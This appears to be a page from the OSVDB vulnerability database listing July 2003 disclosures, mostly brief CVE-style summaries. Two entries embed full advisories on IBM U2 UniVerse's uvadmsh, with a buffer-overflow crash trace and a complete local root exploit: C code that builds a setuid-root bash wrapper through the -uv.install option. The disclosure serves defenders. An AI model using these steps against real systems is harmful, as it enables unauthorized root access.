[CLOSE] OSVDB ID : 8584 - Disclosed: 2003-07-16

Description:

IRIX contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when the Name Service Daemon (nsd) checks the /etc/group file to determine levels of access based upon plus (+) or minus (-) entries. As /etc/group does not have minus (-) entries, the nsd processes group membership entries when they should not be processed, resulting in improper user control access. This flaw may lead to a loss of integrity.

[CLOSE] OSVDB ID : 8587 - Disclosed: 2003-07-16

Description:

IRIX contains a flaw that may allow a remote denial of service. The issue is triggered when a malicious attacker causes the Name Service Daemon (nsd) to consume all system memory via dynamic maps, and will result in loss of availability for the platform.

[CLOSE] OSVDB ID : 8588 - Disclosed: 2003-07-16

Description:

(Description Provided by CVE) : The DNS callbacks in nsd in SGI IRIX 6.5.x through 6.5.20f, and possibly earlier versions, do not perform sufficient sanity checking, with unknown impact.

[CLOSE] OSVDB ID : 8857 - Disclosed: 2003-07-16

Description:

(Description Provided by CVE) : Cross-site scripting (XSS) vulnerability in Infopop Ultimate Bulletin Board (UBB) 6.x allows remote authenticated users to execute arbitrary web script and gain administrative access via the "displayed name" attribute of the "ubber" cookie.

[CLOSE] OSVDB ID : 11458 - Disclosed: 2003-07-16

Description:

(Description Provided by CVE) : admin.php in Digi-ads 1.1 allows remote attackers to bypass authentication via a cookie with the username set to the name of the administrator, which satisfies an improper condition in admin.php that does not require a correct password.

[CLOSE] OSVDB ID : 11459 - Disclosed: 2003-07-16

Description:

(Description Provided by CVE) : admin.php in Digi-news 1.1 allows remote attackers to bypass authentication via a cookie with the username set to the name of the administrator, which satisfies an improper condition in admin.php that does not require a correct password.

[CLOSE] OSVDB ID : 11669 - Disclosed: 2003-07-16

Description:

(Description Provided by CVE) : The php_check_safe_mode_include_dir function in fopen_wrappers.c of PHP 4.3.x returns a success value (0) when the safe_mode_include_dir variable is not specified in configuration, which differs from the previous failure value and may allow remote attackers to exploit file include vulnerabilities in PHP applications.

[CLOSE] OSVDB ID : 11785 - Disclosed: 2003-07-16

Description:

(Description Provided by CVE) : Format string vulnerability in Backup and Restore Utility for Unix (BRU) 17.0 and earlier, when running setuid, allows local users to execute arbitrary code via format string specifiers in a command line argument.

[CLOSE] OSVDB ID : 2318 - Disclosed: 2003-07-15

Description:

--------------020000080506030904030700 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Thanks to IBM for being so receptive with these issues. For those of you that have requested we revive the old "Snosoft" advisories we have begun placing our legacy advisories at http://www.secnetops.biz as time permits. -KF --------------020000080506030904030700 Content-Type: text/plain; name="SRT2003-07-08-1223.txt" Content-Transfer-Encoding: 8bit Content-Disposition: inline; filename="SRT2003-07-08-1223.txt" Secure Network Operations, Inc. http://www.secnetops.com Strategic Reconnaissance Team [email protected] Team Lead Contact [email protected] Our Mission: ************************************************************************ Secure Network Operations offers expertise in Networking, Intrusion Detection Systems (IDS), Software Security Validation, and Corporate/Private Network Security. Our mission is to facilitate a secure and reliable Internet and inter-enterprise communications infrastructure through the products and services we offer. Quick Summary: ************************************************************************ Advisory Number : SRT2003-07-08-1223 Product : IBM U2 UniVerse Version : Version <= 10.0.0.9 ? Vendor : http://ibm.com/software/data/u2/universe/ Class : local Criticality : High (to UniVerse servers with local users) Operating System(s) : Only confirmed on Linux (other unix based?) High Level Explanation ************************************************************************ High Level Description : uvadm can take root via buffer overflows What to do : chmod -s /usr/ibm/uv/bin/uvadmsh Technical Details ************************************************************************ Proof Of Concept Status : SNO does have Poc code Low Level Description : UniVerse is an extended relational database designed for embedding in vertical applications. Its nested relational data model results in intuitive data modeling and fewer resulting tables. UniVerse provides data access, storage and management capabilities across MicrosoftÂ(r) WindowsÂ(r) NT, Linux and UNIplatform. The uvadm user may exploit a buffer overflow in the uvadmsh binary to take root. There is a buffer overflow when processing command line arguments. Please note that without the -uv.install argument this issue is NOT exploitable however the overflow still occurs. (gdb) r -uv.install `perl -e 'print "Z" x 546'` Starting program: uvadmsh -uv.install `perl -e 'print "Z" x 546'` error Program received signal SIGSEGV, Segmentation fault. 0x5a5a5a5a in ?? () (gdb) bt #0 0x5a5a5a5a in ?? () Cannot access memory at address 0x5a5a5a5a You must have uvadm rights in order to exploit this issue. The creation and use of the Unix user 'uvadm' is optional for UniVerse. It is not required for the successfull installation, configuration and administration of UniVerse. The intended use of uvadm is to allow a selected, specific non-root user to perform all aspects of UniVerse administration. [uvadm@vegeta tmp]$ id uid=503(uvadm) gid=503(uvadm) groups=503(uvadm) [uvadm@vegeta tmp]$ ./uvadm_root.pl error sh-2.05b# id uid=0(root) gid=503(uvadm) groups=503(uvadm) Patch or Workaround : chmod -s /usr/ibm/uv/bin/uvadmsh Note: If you decide to 'chmod -s uvadmsh', you will need to be a root user to perform all of the uvadmsh functions. Vendor Status : The IBM U2 staff will have this issue resolved in a future release of IBM U2. Patches may also be supplied on a per client basis at IBM's disgression. Bugtraq URL : to be assigned ------------------------------------------------------------------------ This advisory was released by Secure Network Operations,Inc. as a matter of notification to help administrators protect their networks against the described vulnerability. Exploit source code is no longer released in our advisories. Contact [email protected] for information on how to obtain exploit information. --------------020000080506030904030700--

[CLOSE] OSVDB ID : 2313 - Disclosed: 2003-07-15

Description:

--------------000804060106040403020807 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Thanks to IBM for being so receptive with these issues. For those of you that have requested we revive the old "Snosoft" advisories we have begun placing our legacy advisories at http://www.secnetops.biz as time permits. -KF --------------000804060106040403020807 Content-Type: text/plain; name="SRT2003-07-07-0833.txt" Content-Transfer-Encoding: 8bit Content-Disposition: inline; filename="SRT2003-07-07-0833.txt" Secure Network Operations, Inc. http://www.secnetops.com Strategic Reconnaissance Team [email protected] Team Lead Contact [email protected] Our Mission: ************************************************************************ Secure Network Operations offers expertise in Networking, Intrusion Detection Systems (IDS), Software Security Validation, and Corporate/Private Network Security. Our mission is to facilitate a secure and reliable Internet and inter-enterprise communications infrastructure through the products and services we offer. Quick Summary: ************************************************************************ Advisory Number : SRT2003-07-07-0833 Product : IBM U2 UniVerse Version : Version <= 10.0.0.9 ? Vendor : http://ibm.com/software/data/u2/universe/ Class : local Criticality : High (to UniVerse servers with local users) Operating System(s) : Only confirmed on Linux (other unix based?) High Level Explanation ************************************************************************ High Level Description : users with uvadm rights can take root What to do : chmod -s /usr/ibm/uv/bin/uvadmsh Technical Details ************************************************************************ Proof Of Concept Status : SNO Does have PoC code for this issue. Low Level Description : UniVerse is an extended relational database designed for embedding in vertical applications. Its nested relational data model results in intuitive data modeling and fewer resulting tables. UniVerse provides data access, storage and management capabilities across MicrosoftÂ(r) WindowsÂ(r) NT, Linux and UNIplatform. The creation and use of the Unix user 'uvadm' is optional for UniVerse. It is not required for the successfull installation, configuration and administration of UniVerse. The intended use of uvadm is to allow a selected, specific non-root user to perform all aspects of UniVerse administration. The uvadmsh program checks the users name against the string "uvadm" which means in order to exploit this issue you need to have access to the user uvadm. [kf@vegeta kf]$ ltrace /tmp/uvadmsh -uv.install /tmp ... strcmp("kf", "uvadm") = -1 [uvadm@vegeta uvadm]$ id uid=503(uvadm) gid=503(uvadm) groups=503(uvadm) You will note that with the proper uid the binary begins looking for the command line option "-uv.install" which is the path to a binary file to execute. [uvadm@vegeta uvadm]$ ltrace /tmp/uvadmsh -uv.install /tmp ... strcmp("uvadm", "uvadm") = 0 strcmp("-uv.install", "-uv.install") = 0 This condition is fairly easy to take advantage of as you can see here. [uvadm@vegeta uvadm]$ cat > /tmp/uv.install.c main() { setuid(0); system("cc -o /tmp/owned /tmp/owned.c"); system("chmod 4755 /tmp/owned"); } [uvadm@vegeta uvadm]$ cc -o /tmp/uv.install /tmp/uv.install.c [uvadm@vegeta uvadm]$ cat > /tmp/owned.c main() { setuid(0); system("/bin/bash"); } [uvadm@vegeta uvadm]$ ls -al /tmp/owned ls: /tmp/owned: No such file or directory [uvadm@vegeta uvadm]$ /usr/ibm/uv/bin/uvadmsh -uv.install /tmp [uvadm@vegeta uvadm]$ ls -al /tmp/owned -rwsr-xr-x 1 root uvadm 11640 Jul 2 20:15 /tmp/owned [uvadm@vegeta uvadm]$ /tmp/owned [root@vegeta uvadm]# id uid=0(root) gid=503(uvadm) groups=503(uvadm) Patch or Workaround : chmod -s /usr/ibm/uv/bin/uvadmsh Note: If you decide to 'chmod -s uvadmsh', you will need to be a root user to perform all of the uvadmsh functions. Vendor Status : The IBM U2 staff will have this issue resolved in a future release of IBM U2. Patches may also be supplied on a per client basis at IBM's disgression. Bugtraq URL : to be assigned ------------------------------------------------------------------------ This advisory was released by Secure Network Operations,Inc. as a matter of notification to help administrators protect their networks against the described vulnerability. Exploit source code is no longer released in our advisories. Contact [email protected] for information on how to obtain exploit information. --------------000804060106040403020807--

[CLOSE] OSVDB ID : 2312 - Disclosed: 2003-07-15

Description:

(Description Provided by CVE) : cci_dir in IBM U2 UniVerse 10.0.0.9 and earlier creates hard links and unlinks files as root, which allows local users to gain privileges by deleting and overwriting arbitrary files.

[CLOSE] OSVDB ID : 25382 - Disclosed: 2003-07-15

Description:

Unknown / Incomplete

[CLOSE] OSVDB ID : 27816 - Disclosed: 2003-07-15

Description:

Unknown / Incomplete

[CLOSE] OSVDB ID : 27817 - Disclosed: 2003-07-15

Description:

Unknown / Incomplete

[CLOSE] OSVDB ID : 3373 - Disclosed: 2003-07-15

Description:

Invision Power File Manager contains a non descript vulnerability. Currently, the vendor has not released any details regarding the nature of the vulnerability, but has classified it as "severe". The issue is due to unspecified problems in the index.php and/or edit.php scripts.

[CLOSE] OSVDB ID : 9190 - Disclosed: 2003-07-15

Description:

(Description Provided by CVE) : Cross-site scripting (XSS) vulnerability in Splatt Forum allows remote attackers to insert arbitrary HTML and web script via the post icon (image_subject) field.

[CLOSE] OSVDB ID : 9673 - Disclosed: 2003-07-15

Description:

(Description Provided by CVE) : uvadmsh in IBM U2 UniVerse 10.0.0.9 and earlier trusts the user-supplied -uv.install command line option to find and execute the uv.install program, which allows local users to gain privileges by providing a pathname that is under control of the user.

[CLOSE] OSVDB ID : 9683 - Disclosed: 2003-07-15

Description:

(Description Provided by CVE) : cci_dir in IBM U2 UniVerse 10.0.0.9 and earlier creates hard links and unlinks files as root, which allows local users to gain privileges by deleting and overwriting arbitrary files.

[CLOSE] OSVDB ID : 12020 - Disclosed: 2003-07-15

Description:

(Description Provided by CVE) : Buffer overflow in (1) nethack 3.4.0 and earlier, and (2) falconseye 1.9.3 and earlier, which is based on nethack, allows local users to gain privileges via a long -s command line option.

[CLOSE] OSVDB ID : 60576 - Disclosed: 2003-07-15

Description:

Unknown / Incomplete

[CLOSE] OSVDB ID : 2317 - Disclosed: 2003-07-14

Description:

nfs-utils contains a flaw that allows a remote attacker to gain root privileges. The issue is due to a buffer overflow caused by an off-by-one error in the "xlog" function. If an attacker creates a specially crafted RPC request to the rpc.mountd daemon they may be able to execute arbitrary code.

[CLOSE] OSVDB ID : 6270 - Disclosed: 2003-07-14

Description:

A remote overflow exists in Netscape Navigator. The issue is due to improper bounds checking of the npcdt.dll plug-in resulting in a buffer overflow. By creating a malicious file with an overly long file name, an attacker can cause arbitrary code execution, resulting in a loss of integrity.

[CLOSE] OSVDB ID : 2305 - Disclosed: 2003-07-14

Description:

e107 contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate e107 custom tags upon submission to the class2.php script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

[CLOSE] OSVDB ID : 18723 - Disclosed: 2003-07-14

Description:

Unknown / Incomplete

[CLOSE] OSVDB ID : 20081 - Disclosed: 2003-07-14

Description:

Unknown / Incomplete

[CLOSE] OSVDB ID : 3684 - Disclosed: 2003-07-14

Description:

A double-free memory allocation error allows remote attackers to cause a denial of service (crash) and may allow the execution of arbitrary code via an SSL client certificate with crafted invalid ASN.1 encoding.

[CLOSE] OSVDB ID : 3686 - Disclosed: 2003-07-14

Description:

A remote overflow exists in OpenSSL. OpenSSL fails to correctly parse ASN.1 tags in OpenSSL client certificates, resulting in a buffer overflow. With a specially crafted request, an attacker can cause denial of service in OpenSSL or an application using it, resulting in a loss of availability.

[CLOSE] OSVDB ID : 4738 - Disclosed: 2003-07-14

Description:

Unknown / Incomplete

[CLOSE] OSVDB ID : 8647 - Disclosed: 2003-07-14

Description:

(Description Provided by CVE) : ImageMagick 5.4.3.x and earlier allows attackers to cause a denial of service (crash) and possibly execute arbitrary code via a "%x" filename, possibly triggering a format string vulnerability.

[CLOSE] OSVDB ID : 11803 - Disclosed: 2003-07-14

Description:

(Description Provided by CVE) : X Fontserver for Truetype fonts (xfstt) 1.4 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a (1) FS_QueryXExtents8 or (2) FS_QueryXBitmaps8 packet, and possibly other types of packets, with a large num_ranges value, which causes an out-of-bounds array access.

[CLOSE] OSVDB ID : 11832 - Disclosed: 2003-07-14

Description:

(Description Provided by CVE) : NeoModus Direct Connect 1.0 build 9, and possibly other versions, allows remote attackers to cause a denial of service (connection and possibly memory exhaustion) via a flood of ConnectToMe requests containing arbitrary IP addresses and ports.

[CLOSE] OSVDB ID : 32090 - Disclosed: 2003-07-13

Description:

(Description Provided by CVE) : Twilight Webserver 1.3.3.0 allows remote attackers to cause a denial of service (application crash) via a GET request for a long URI, a different vulnerability than CVE-2004-2376.

[CLOSE] OSVDB ID : 14717 - Disclosed: 2003-07-13

Description:

Unknown / Incomplete

[CLOSE] OSVDB ID : 2316 - Disclosed: 2003-07-13

Description:

Unknown / Incomplete

[CLOSE] OSVDB ID : 2314 - Disclosed: 2003-07-13

Description:

Unknown / Incomplete

[CLOSE] OSVDB ID : 11892 - Disclosed: 2003-07-12

Description:

(Description Provided by CVE) : Polycom MGC 25 allows remote attackers to cause a denial of service (crash) via a large number of "user" requests to the control port 5003, as demonstrated using the blast TCP stress tester.

[CLOSE] OSVDB ID : 18018 - Disclosed: 2003-07-11

Description:

Unknown / Incomplete

[CLOSE] OSVDB ID : 3170 - Disclosed: 2003-07-11

Description:

W-Agora contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate variables upon submission to the profile.php3 script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

[CLOSE] OSVDB ID : 3172 - Disclosed: 2003-07-11

Description:

W-Agora contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the mod and file variables upon submission to the modules.php3 script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

[CLOSE] OSVDB ID : 3173 - Disclosed: 2003-07-11

Description:

W-Agora contains a feature that may lead to an unauthorized information disclosure. The issue is triggered when index.php is requested with "about" or "info" as the query, which will disclose user names, database-systems, paths, and versions resulting in a loss of confidentiality.